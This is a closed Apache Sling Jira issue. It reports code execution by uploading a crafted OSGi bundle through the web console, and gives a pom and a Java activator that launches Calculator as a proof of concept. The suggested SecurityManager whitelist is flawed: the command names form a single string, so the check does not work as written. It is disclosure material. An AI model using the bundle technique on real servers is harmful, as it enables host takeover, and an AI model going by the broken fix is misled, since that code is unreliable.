You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@sling.apache.org by "QSec-Team (Jira)" <ji...@apache.org> on 2022/11/02 12:53:00 UTC

[jira] [Closed] (SLING-11658) sling remote code execute

     [ https://issues.apache.org/jira/browse/SLING-11658?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

QSec-Team closed SLING-11658.
-----------------------------

> sling remote code execute
> -------------------------
>
>                 Key: SLING-11658
>                 URL: https://issues.apache.org/jira/browse/SLING-11658
>             Project: Sling
>          Issue Type: Bug
>          Components: Console
>    Affects Versions: App CMS 1.1.2
>         Environment: OpenJDK Runtime Environment (Zulu 8.64.0.19-CA-macos-aarch64) (build 1.8.0_345-b01)
>            Reporter: QSec-Team
>            Priority: Major
>         Attachments: 1.png, 2.png
>
>
> h1. Utilization process
>  
> After Sling logs in,Osgi management function,You can obtain host control by uploading the bundle component package.
> !1.png!
>  
> After uploading the malicious bundle package constructed by the attacker,First click the "Refresh Package Imports" button, and then click the "start" button,This will trigger the bundle group price loading, and the malicious code will be executed.
> !2.png!
>  
> h1. Jar package construction:
>  
> Create a new Maven project and add the following compilation options in pom.xml:
> {code:java}
>    <build>
>         <plugins>
>             <plugin>
>                 <groupId>org.apache.maven.plugins</groupId>
>                 <artifactId>maven-assembly-plugin</artifactId>
>                 <configuration>
>                     <descriptorRefs>
>                         <descriptorRef>jar-with-dependencies</descriptorRef>
>                     </descriptorRefs>
>                     <archive>
>                         <manifestEntries>
>                             <Bundle-SymbolicName>shxjia</Bundle-SymbolicName>
>                             <Bundle-Activator>jsx.ink.Main</Bundle-Activator>
>                             <Bundle-Version>6.6.6</Bundle-Version>
>                         </manifestEntries>
>                     </archive>
>                 </configuration>
>             </plugin>
>         </plugins>
>     </build> {code}
> Create Main.java in the source code folder:
> Note the "package jsx. ink;" in the source code It should correspond to the Bundle Activator attribute in pom.xml.
> {code:java}
> package jsx.ink;
> public class Main {
>     static {
>         try {
>             Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
>         } catch (Exception e) {
>         }
>     }
>     public static void main(String[] args) {        System.out.println("Hello world!");
>     }
> } {code}
> After the code is written, enter the directory where pom.xml is located and use the maven command to package:
> {code:java}
> mvn assembly:assembly -f pom.xml {code}
> h1.  
> h1. Repair
>  
> You can use securityManager to restrict some operations.
> {code:java}
>  SecurityManager securityManager = new SecurityManager() {
>             @Override
>             public void checkExec(String cmd) {
>                 List<String> whiteList = Arrays.asList("whoami,netstat");                if (!whiteList.contains(cmd)) {
>                     throw new RuntimeException("command execute denied!");
>                 }
>                 super.checkExec(cmd);
>             }
>         };
>         System.setSecurityManager(securityManager); {code}



--
This message was sent by Atlassian Jira
(v8.20.10#820010)